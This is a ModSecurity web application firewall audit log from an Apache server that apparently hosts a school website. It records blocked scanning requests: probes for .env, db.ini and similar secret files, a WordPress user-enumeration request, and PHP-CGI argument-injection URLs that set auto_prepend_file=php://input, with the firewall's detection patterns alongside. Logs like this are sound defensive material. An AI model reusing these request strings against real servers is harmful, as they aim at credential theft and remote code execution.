--7ae94753-F-- HTTP/1.1 200 OK Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT ETag: "13cd-6034254946480" Accept-Ranges: bytes Content-Length: 5069 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html --7ae94753-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1745397199097477 3393 (- - -) Stopwatch2: 1745397199097477 3393; combined=2052, p1=476, p2=1490, p3=26, p4=23, p5=37, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ae94753-Z-- --8744203e-A-- [23/Apr/2025:15:45:26 +0700] aAioptIw_rqnm4P5_adlKAAAAEc 103.236.140.4 57448 103.236.140.4 8181 --8744203e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://smkn22-jkt.sch.id Host: smkn22-jkt.sch.id X-Real-IP: 154.86.114.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.86.114.147 X-Forwarded-Proto: https Connection: close Origin: https://smkn22-jkt.sch.id User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --8744203e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8744203e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745397926300602 3091 (- - -) Stopwatch2: 1745397926300602 3091; combined=1302, p1=436, p2=836, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8744203e-Z-- --a66bdd4f-A-- [23/Apr/2025:18:09:15 +0700] aAjKWz1ahuoJLEjKiAXeBgAAAJg 103.236.140.4 38062 103.236.140.4 8181 --a66bdd4f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.86 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3879.0 Safari/537.36 Edg/78.0.249.1 Accept-Charset: utf-8 --a66bdd4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a66bdd4f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745406555347838 849 (- - -) Stopwatch2: 1745406555347838 849; combined=391, p1=350, p2=0, p3=0, p4=0, p5=41, sr=139, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a66bdd4f-Z-- --b8ccf265-A-- [23/Apr/2025:19:23:05 +0700] aAjbqRuwXEWV6ydgl51A-AAAAAQ 103.236.140.4 52536 103.236.140.4 8181 --b8ccf265-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 36.137.113.226 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 36.137.113.226 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --b8ccf265-C-- --b8ccf265-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8ccf265-E-- --b8ccf265-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745410985782112 4577 (- - -) Stopwatch2: 1745410985782112 4577; combined=3161, p1=478, p2=2645, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8ccf265-Z-- --bb623109-A-- [23/Apr/2025:19:29:45 +0700] aAjdORuwXEWV6ydgl51HwAAAAA4 103.236.140.4 49500 103.236.140.4 8181 --bb623109-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.108 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.108 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --bb623109-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb623109-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745411385449652 1175 (- - -) Stopwatch2: 1745411385449652 1175; combined=696, p1=334, p2=0, p3=0, p4=0, p5=362, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb623109-Z-- --210b875b-A-- [23/Apr/2025:19:29:45 +0700] aAjdOT1ahuoJLEjKiAXzWwAAAJY 103.236.140.4 49510 103.236.140.4 8181 --210b875b-B-- GET /config/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.108 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.108 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --210b875b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --210b875b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745411385619885 841 (- - -) Stopwatch2: 1745411385619885 841; combined=348, p1=292, p2=0, p3=0, p4=0, p5=55, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --210b875b-Z-- --881c734a-A-- [23/Apr/2025:19:29:45 +0700] aAjdOT1ahuoJLEjKiAXzXgAAAIU 103.236.140.4 49524 103.236.140.4 8181 --881c734a-B-- GET /.env.production HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.108 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.108 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --881c734a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --881c734a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745411385821086 854 (- - -) Stopwatch2: 1745411385821086 854; combined=397, p1=358, p2=0, p3=0, p4=0, p5=39, sr=139, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --881c734a-Z-- --cde7061b-A-- [23/Apr/2025:19:29:45 +0700] aAjdORuwXEWV6ydgl51HwQAAABA 103.236.140.4 49538 103.236.140.4 8181 --cde7061b-B-- GET /api/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.108 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.108 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --cde7061b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cde7061b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745411385990611 947 (- - -) Stopwatch2: 1745411385990611 947; combined=446, p1=346, p2=0, p3=0, p4=0, p5=100, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cde7061b-Z-- --3be9b765-A-- [23/Apr/2025:19:29:46 +0700] aAjdOtIw_rqnm4P5_aeEYAAAAEQ 103.236.140.4 49560 103.236.140.4 8181 --3be9b765-B-- GET /settings/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.108 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.108 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --3be9b765-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3be9b765-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745411386203893 747 (- - -) Stopwatch2: 1745411386203893 747; combined=319, p1=283, p2=0, p3=0, p4=0, p5=36, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3be9b765-Z-- --3240d63e-A-- [23/Apr/2025:19:29:47 +0700] aAjdO9Iw_rqnm4P5_aeEawAAAEI 103.236.140.4 49700 103.236.140.4 8181 --3240d63e-B-- GET /db.ini HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.108 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.108 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --3240d63e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3240d63e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745411387902059 2284 (- - -) Stopwatch2: 1745411387902059 2284; combined=787, p1=388, p2=370, p3=0, p4=0, p5=29, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3240d63e-Z-- --45331b61-A-- [23/Apr/2025:19:29:50 +0700] aAjdPhuwXEWV6ydgl51H2QAAAAE 103.236.140.4 49884 103.236.140.4 8181 --45331b61-B-- GET /docker/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.108 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.108 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --45331b61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --45331b61-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745411390156247 631 (- - -) Stopwatch2: 1745411390156247 631; combined=248, p1=214, p2=0, p3=0, p4=0, p5=34, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45331b61-Z-- --00c01a0a-A-- [23/Apr/2025:19:39:07 +0700] aAjfaz1ahuoJLEjKiAX6UwAAAI4 103.236.140.4 55582 103.236.140.4 8181 --00c01a0a-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.148.10.172 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.148.10.172 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0) Accept-Charset: utf-8 --00c01a0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --00c01a0a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745411947452103 1902 (- - -) Stopwatch2: 1745411947452103 1902; combined=330, p1=295, p2=0, p3=0, p4=0, p5=35, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00c01a0a-Z-- --5dbcf92c-A-- [23/Apr/2025:20:58:57 +0700] aAjyIRuwXEWV6ydgl512OQAAABI 103.236.140.4 51976 103.236.140.4 8181 --5dbcf92c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.227.231.159 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.227.231.159 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --5dbcf92c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5dbcf92c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745416737451701 873 (- - -) Stopwatch2: 1745416737451701 873; combined=386, p1=339, p2=0, p3=0, p4=0, p5=47, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5dbcf92c-Z-- --f96b637a-A-- [23/Apr/2025:21:00:07 +0700] aAjyZxuwXEWV6ydgl512mAAAABc 103.236.140.4 53032 103.236.140.4 8181 --f96b637a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:47.0) Gecko/20100101 Firefox/47.0 Accept-Charset: utf-8 --f96b637a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f96b637a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745416807132250 756 (- - -) Stopwatch2: 1745416807132250 756; combined=315, p1=277, p2=0, p3=0, p4=0, p5=38, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f96b637a-Z-- --4eb2012e-A-- [23/Apr/2025:21:08:02 +0700] aAj0QjI97BrbgvDq16RPdAAAAMU 103.236.140.4 33352 103.236.140.4 8181 --4eb2012e-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --4eb2012e-C-- --4eb2012e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4eb2012e-E-- --4eb2012e-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745417282777179 5288 (- - -) Stopwatch2: 1745417282777179 5288; combined=3706, p1=501, p2=3172, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4eb2012e-Z-- --af182907-A-- [23/Apr/2025:21:16:14 +0700] aAj2Lj1ahuoJLEjKiAUbwwAAAI0 103.236.140.4 40058 103.236.140.4 8181 --af182907-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.107 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --af182907-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --af182907-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745417774327819 726 (- - -) Stopwatch2: 1745417774327819 726; combined=257, p1=220, p2=0, p3=0, p4=0, p5=37, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af182907-Z-- --e0dc292b-A-- [23/Apr/2025:21:16:15 +0700] aAj2LzI97BrbgvDq16RQuwAAAMw 103.236.140.4 40068 103.236.140.4 8181 --e0dc292b-B-- GET /portal/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.107 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --e0dc292b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0dc292b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745417775038473 634 (- - -) Stopwatch2: 1745417775038473 634; combined=247, p1=214, p2=0, p3=0, p4=0, p5=33, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0dc292b-Z-- --0afdda78-A-- [23/Apr/2025:21:16:15 +0700] aAj2LxuwXEWV6ydgl517PAAAABI 103.236.140.4 40070 103.236.140.4 8181 --0afdda78-B-- GET /env/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.107 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --0afdda78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0afdda78-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745417775204336 762 (- - -) Stopwatch2: 1745417775204336 762; combined=335, p1=303, p2=0, p3=0, p4=0, p5=32, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0afdda78-Z-- --fbb29e23-A-- [23/Apr/2025:21:16:15 +0700] aAj2LxuwXEWV6ydgl517PQAAABU 103.236.140.4 40072 103.236.140.4 8181 --fbb29e23-B-- GET /api/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.83.103.107 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.83.103.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --fbb29e23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fbb29e23-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745417775501491 632 (- - -) Stopwatch2: 1745417775501491 632; combined=256, p1=223, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fbb29e23-Z-- 